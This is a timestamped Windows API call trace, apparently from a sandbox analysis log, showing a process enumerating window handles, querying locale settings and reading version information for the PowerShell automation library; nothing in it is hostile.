	[0471.478] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1074
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x106c
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1474
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1414
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xbd0
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x550
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa38
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x16d0
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x16d4
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x15bc
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x15a0
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x159c
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1598
	[0471.479] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1594
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1590
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x158c
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1588
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1584
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1580
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x157c
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1488
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1404
	[0471.480] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x11b8
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xbd4
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe0c
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd30
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe70
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x13b8
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe20
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe2c
	[0471.481] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe00
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe04
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc94
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x13b0
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x13ac
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x13a8
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1374
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x132c
	[0471.482] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1328
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x12d0
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x12cc
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x12c8
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1290
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1218
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1214
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x11ec
	[0471.483] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x11e8
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x11cc
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1140
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe6c
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x6e8
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc6c
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf94
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xffc
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf74
	[0471.484] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf08
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf0c
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xed8
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe90
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xea8
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfa8
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfbc
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfb8
	[0471.485] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfb4
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfb0
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfac
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfc0
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfd0
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf88
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf84
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf80
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xde0
	[0471.486] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xddc
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xdd8
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd34
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd10
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd0c
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc9c
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc74
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc1c
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc08
	[0471.487] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xabc
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x24c
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xbb0
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xbfc
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb10
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x374
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x368
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb28
	[0471.488] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xae8
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb14
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x95c
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa8c
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x46c
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb3c
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa90
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xad0
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa9c
	[0471.489] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xaa0
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb1c
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x7e0
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa74
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x694
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa28
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x9b0
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x8d8
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x940
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x93c
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4ec
	[0471.490] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x150
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x720
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x3c4
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x7d4
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x6c8
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb54
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb54
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb5c
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x838
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x818
	[0471.491] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x5b8
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x494
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1ec
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x440
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x7e8
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x730
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x2c8
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x31c
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x330
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x128
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x5c8
	[0471.492] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x6f8
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x358
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x73c
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb0
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x250
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x240
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x790
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x61c
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x568
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x538
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x540
	[0471.493] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.494] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x79c
	[0471.494] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4e0
	[0471.494] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.494] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x778
	[0472.855] WerSetFlags () returned 0x0
	[0472.863] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0472.864] CoTaskMemFree (pv=0x0) 
	[0472.865] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdea8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdea0 | out: pulNumLanguages=0x1cdea8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdea0) returned 1
	[0472.865] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdea8, pwszLanguagesBuffer=0x2b31ef0, pcchLanguagesBuffer=0x1cdea0 | out: pulNumLanguages=0x1cdea8, pwszLanguagesBuffer=0x2b31ef0, pcchLanguagesBuffer=0x1cdea0) returned 1
	[0472.870] CoTaskMemAlloc (cb=0x24) returned 0x3ded70
	[0472.870] GetUserDefaultLocaleName (in: lpLocaleName=0x3ded70, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0472.871] CoTaskMemFree (pv=0x3ded70) 
	[0472.894] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0472.894] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.894] CoTaskMemFree (pv=0x3e2be0) 
	[0472.896] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0472.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.896] CoTaskMemFree (pv=0x3e2be0) 
	[0472.898] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0472.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.898] CoTaskMemFree (pv=0x3e2be0) 
	[0474.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd910, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.076] SetErrorMode (uMode=0x1) returned 0x1
	[0474.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cdb20 | out: lpFileInformation=0x1cdb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0474.076] SetErrorMode (uMode=0x1) returned 0x1
	[0474.076] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdd90 | out: lpdwHandle=0x1cdd90) returned 0x94c
	[0474.077] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b35780 | out: lpData=0x2b35780) returned 1
	[0474.078] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdd08, puLen=0x1cdd00 | out: lplpBuffer=0x1cdd08*=0x2b3581c, puLen=0x1cdd00) returned 1
	[0474.078] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b358f8, puLen=0x1cdc70) returned 1
	[0474.078] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0474.078] CoTaskMemAlloc (cb=0x2e) returned 0x3e11c0
	[0474.078] lstrcpyW (in: lpString1=0x3e11c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0474.078] CoTaskMemFree (pv=0x3e11c0) 
	[0474.079] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b3594c, puLen=0x1cdc70) returned 1
	[0474.079] lstrlenW (lpString="System.Management.Automation") returned 28
	[0474.079] CoTaskMemAlloc (cb=0x3c) returned 0x3ec7e0
	[0474.079] lstrcpyW (in: lpString1=0x3ec7e0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0474.079] CoTaskMemFree (pv=0x3ec7e0) 
	[0474.079] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b359a8, puLen=0x1cdc70) returned 1
	[0474.079] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0474.079] CoTaskMemAlloc (cb=0x20) returned 0x3e1f80
	[0474.079] lstrcpyW (in: lpString1=0x3e1f80, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0474.079] CoTaskMemFree (pv=0x3e1f80) 
	[0474.079] VerQueryValueW (in: pBlock=0x2b35780, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdc78, puLen=0x1cdc70 | out: lplpBuffer=0x1cdc78*=0x2b359e8, puLen=0x1cdc70) returned 1
	[0474.079] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0474.079] CoTaskMemAlloc (cb=0x44) returned 0x3ec7e0
	[0474.079] lstrcpyW (in: lpString1=0x3ec7e0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0474.079] CoTaskMemFree (pv=0x3ec7e0) 
